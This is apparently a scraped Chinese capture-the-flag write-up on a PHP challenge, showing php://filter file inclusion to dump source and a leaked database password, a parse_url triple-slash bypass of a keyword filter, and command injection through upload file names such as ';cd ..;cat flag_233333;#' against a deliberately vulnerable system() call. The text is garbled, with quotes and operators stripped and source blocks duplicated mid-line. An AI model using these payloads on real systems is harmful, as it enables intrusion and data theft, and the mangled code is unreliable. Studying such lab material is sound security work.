网站建设系统优势,重庆可作为推广的网站,在线阅读小说网站怎么做,建设工程施工合同和承揽合同区别目录
信息收集
代码审计
parse_url解析漏洞 信息收集
进入即是登录页面#xff0c;抓包一看应该是SQL注入#xff0c;但是空格、%、|等等啥的都被waf了,不太好注入#xff0c;先信息收集一波
花一分钟扫下目录#xff0c;发现一个viminfo和register.php Viminfo文件…目录
信息收集
代码审计
parse_url解析漏洞 信息收集
进入即是登录页面抓包一看应该是SQL注入但是空格、%、|等等啥的都被waf了,不太好注入先信息收集一波
花一分钟扫下目录发现一个viminfo和register.php Viminfo文件是Vim用来记录退出时的状态 200 /index.php
200 /login.php
200 /register.php
200 /.viminfo
403 /.htaccessvim updateadmin.php
vim info.php
vim login.php
发现一个info.php和updateadmin.php,访问的回显都是you can not visit it directly我们先注册账号
注册admin时显示 Username has been registered! 查看URL似乎是文件包含用伪协议读取下user源码看看 /user.php?pagephp://filter/convert.base64-encode/resourceuser 代码审计
?php
require_once(function.php);
if( !isset( $_SESSION[user] )){Header(Location: index.php);}
if($_SESSION[isadmin] 1){$oper_you_can_do $OPERATE_admin;
}else{$oper_you_can_do $OPERATE;
}
//die($_SESSION[isadmin]);
if($_SESSION[isadmin] 1){if(!isset($_GET[page]) || $_GET[page] ){$page info;}else {$page $_GET[page];}
}
else{if(!isset($_GET[page])|| $_GET[page] ){$page guest;}else {$page $_GET[page];if($page info){
// echo(scriptalert(no premission to visit info, only admin can, you are guest)/script);Header(Location: user.php?pageguest);}}
}
filter_directory();
//if(!in_array($page,$oper_you_can_do)){
// $page info;
//}
include $page.php;
? /user.php?pagephp://filter/convert.base64-encode/resourcefunction ?php
require_once(function.php);
if( !isset( $_SESSION[user] )){Header(Location: index.php);}
if($_SESSION[isadmin] 1){$oper_you_can_do $OPERATE_admin;
}else{$oper_you_can_do $OPERATE;
}
//die($_SESSION[isadmin]);
if($_SESSION[isadmin] 1){if(!isset($_GET[page]) || $_GET[page] ){$page info;}else {$page $_GET[page];}
}
else{if(!isset($_GET[page])|| $_GET[page] ){$page guest;}else {$page $_GET[page];if($page info){
// echo(scriptalert(no premission to visit info, only admin can, you are guest)/script?php
session_start();
require_once config.php;
function Hacker()
{Header(Location: hacker.php);die();
}function filter_directory()
{$keywords [flag,manage,ffffllllaaaaggg];$uri parse_url($_SERVER[REQUEST_URI]);parse_str($uri[query], $query);
// var_dump($query);
// die();foreach($keywords as $token){foreach($query as $k $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function filter_directory_guest()
{$keywords [flag,manage,ffffllllaaaaggg,info];$uri parse_url($_SERVER[REQUEST_URI]);parse_str($uri[query], $query);
// var_dump($query);
// die();foreach($keywords as $token){foreach($query as $k $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function Filter($string)
{global $mysqli;$blacklist information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password;$whitelist 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ(),_*-;for ($i 0; $i strlen($string); $i) {if (strpos($whitelist, $string[$i]) false) {Hacker();}}if (preg_match(/$blacklist/is, $string)) {Hacker();}if (is_string($string)) {return $mysqli-real_escape_string($string);} else {return ;}
}function sql_query($sql_query)
{global $mysqli;$res $mysqli-query($sql_query);return $res;
}function login($user, $pass)
{$user Filter($user);$pass md5($pass);$sql select * from albert_users where username_which_you_do_not_know $user and password_which_you_do_not_know_too $pass;echo $sql;$res sql_query($sql);
// var_dump($res);
// die();if ($res-num_rows) {$data $res-fetch_array();$_SESSION[user] $data[username_which_you_do_not_know];$_SESSION[login] 1;$_SESSION[isadmin] $data[isadmin_which_you_do_not_know_too_too];return true;} else {return false;}return;
}function updateadmin($level,$user)
{$sql update albert_users set isadmin_which_you_do_not_know_too_too $level where username_which_you_do_not_know$user ;echo $sql;$res sql_query($sql);
// var_dump($res);
// die();
// die($res);if ($res 1) {return true;} else {return false;}return;
}function register($user, $pass)
{global $mysqli;$user Filter($user);$pass md5($pass);$sql insert into albert_users(username_which_you_do_not_know,password_which_you_do_not_know_too,isadmin_which_you_do_not_know_too_too) VALUES ($user,$pass,0);$res sql_query($sql);return $mysqli-insert_id;
}function logout()
{session_destroy();Header(Location: index.php);
}?/user.php?pagephp://filter/convert.base64-encode/resourceconfig ?php
require_once(function.php);
if( !isset( $_SESSION[user] )){Header(Location: index.php);}
if($_SESSION[isadmin] 1){$oper_you_can_do $OPERATE_admin;
}else{$oper_you_can_do $OPERATE;
}
//die($_SESSION[isadmin]);
if($_SESSION[isadmin] 1){if(!isset($_GET[page]) || $_GET[page] ){$page info;}else {$page $_GET[page];}
}
else{if(!isset($_GET[page])|| $_GET[page] ){$page guest;}else {$page $_GET[page];if($page info){
// echo(scriptalert(no premission to visit info, only admin can, you are guest)/script?php
session_start();
require_once config.php;
function Hacker()
{Header(Location: hacker.php);die();
}function filter_directory()
{$keywords [flag,manage,ffffllllaaaaggg];$uri parse_url($_SERVER[REQUEST_URI]);parse_str($uri[query], $query);
// var_dump($query);
// die();foreach($keywords as $token){foreach($query as $k $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function filter_directory_guest()
{$keywords [flag,manage,ffffllllaaaaggg,info];$uri parse_url($_SERVER[REQUEST_URI]);parse_str($uri[query], $query);
// var_dump($query);
// die();foreach($keywords as $token){foreach($query as $k $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function Filter($string)
{global $mysqli;$blacklist information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password;$whitelist 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ(),_*-;for ($i 0; $i strlen($string); $i) {if (strpos($whitelist, $string[$i]) false) {Hacker();}}if (preg_match(/$blacklist/is, $string)) {Hacker();}if (is_string($string)) {return $mysqli-real_escape_string($string);} else {return ;}
}function sql_query($sql_query)
{global $mysqli;$res $mysqli-query($sql_query);return $res;
}function login($user, $pass)
{$user Filter($user);$pass md5($pass);$sql select * from albert_users where username_which_you_do_not_know $user and password_which_you_do_not_know_too $pass;echo $sql;$res sql_query($sql);
// var_dump($res);
// die();if ($res-num_rows) {$data $res-fetch_array();$_SESSION[user] $data[username_which_you_do_not_know];$_SESSION[login] 1;$_SESSION[isadmin] $data[isadmin_which_you_do_not_know_too_too];return true;} else {return false;}return;
}function updateadmin($level,$user)
{$sql update albert_users set isadmin_which_you_do_not_know_too_too $level where username_which_you_do_not_know$user ;echo $sql;$res sql_query($sql);
// var_dump($res);
// die();
// die($res);if ($res 1) {return true;} else {return false;}return;
}function register($user, $pass)
{global $mysqli;$user Filter($user);$pass md5($pass);$sql insert into albert_users(username_which_you_do_not_know,password_which_you_do_not_know_too,isadmin_which_you_do_not_know_too_too) VALUES ($user,$pass,0);$res sql_query($sql);return $mysqli-insert_id;
}function logout()
{session_destroy();Header(Location: index.php);
}?
?php
error_reporting(E_ERROR | E_WARNING | E_PARSE);
define(BASEDIR, /var/www/html/);
define(FLAG_SIG, 1);
$OPERATE array(userinfo,upload,search);
$OPERATE_admin array(userinfo,upload,search,manage);
$DBHOST localhost;
$DBUSER root;
$DBPASS Nu1LCTF2018!#qwe;
//$DBPASS ;
$DBNAME N1CTF;
$mysqli new mysqli($DBHOST, $DBUSER, $DBPASS, $DBNAME);
if(mysqli_connect_errno()){echo no sql connection.mysqli_connect_error();$mysqlinull;die();
}
?$keywords [flag,manage,ffffllllaaaaggg]这三个页面可能有重要信息 parse_url解析漏洞 $keywords [flag,manage,ffffllllaaaaggg];$uri parse_url($_SERVER[REQUEST_URI]);parse_str($uri[query], $query);
这里看下处理的逻辑
?php
$ahttp://78fc9602-02c3-44ec-80cc-3d0163ecb605.node4.buuoj.cn:81/user.php?pageguest;
$uri parse_url($a);
print_r($uri);
//parse_str($uri[], $query);
? Array ( [scheme] http [host] 78fc9602-02c3-44ec-80cc-3d0163ecb605.node4.buuoj.cn [port] 81 [path] /user.php [query] pageguest ) ?php
$ahttp://78fc9602-02c3-44ec-80cc-3d0163ecb605.node4.buuoj.cn:81/user.php?pageguest;
$uri parse_url($a);
//print_r($uri);
parse_str($uri[query],$query);
print_r($query);
//parse_str($uri[], $query);
? Array ( [page] guest ) 我们这里查到PHP版本是5.5.9 这里利用parse_url解析漏洞
///user.php?pagephp://filter/convert.base64-encode/resourceffffllllaaaaggg
?php
if (FLAG_SIG ! 1){die(you can not visit it directly);
}else {echo you can find sth in m4aaannngggeee;
}
?
///user.php?pagephp://filter/convert.base64-encode/resourcem4aaannngggeee
?php
if (FLAG_SIG ! 1){die(you can not visit it directly);
}
include templates/upload.html;
?
尝试上传文件上传失败。发现/templates/upllloadddd.php 读upllloadddd的源码
?php
$allowtype array(gif,png,jpg);
$size 10000000;
$path ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/;
$filename $_FILES[file][name];
if(is_uploaded_file($_FILES[file][tmp_name])){if(!move_uploaded_file($_FILES[file][tmp_name],$path.$filename)){die(error:can not move);}
}else{die(error:not an upload fileï¼);
}
$newfile $path.$filename;
echo file upload successbr /;
echo $filename;
$picdata system(cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/.$filename. | base64 -w 0);
echo img srcdata:image/png;base64,.$picdata./img;
if($_FILES[file][error]0){unlink($newfile);die(Upload file error: );
}
$ext array_pop(explode(.,$_FILES[file][name]));
if(!in_array($ext,$allowtype)){unlink($newfile);
}
? $picdata system(cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/.$filename. | base64 -w 0); 现在需要找到上传点莫非是之前的user.php?pageupdateadmin吗发现也没有上传处最后看wp发现上传点在/user.php?pagem4aaannngggeee看两者的页面貌似是继承来的 貌似不能加/ filename;cd ..;ls ;# ;cd ..;cat flag_233333;#
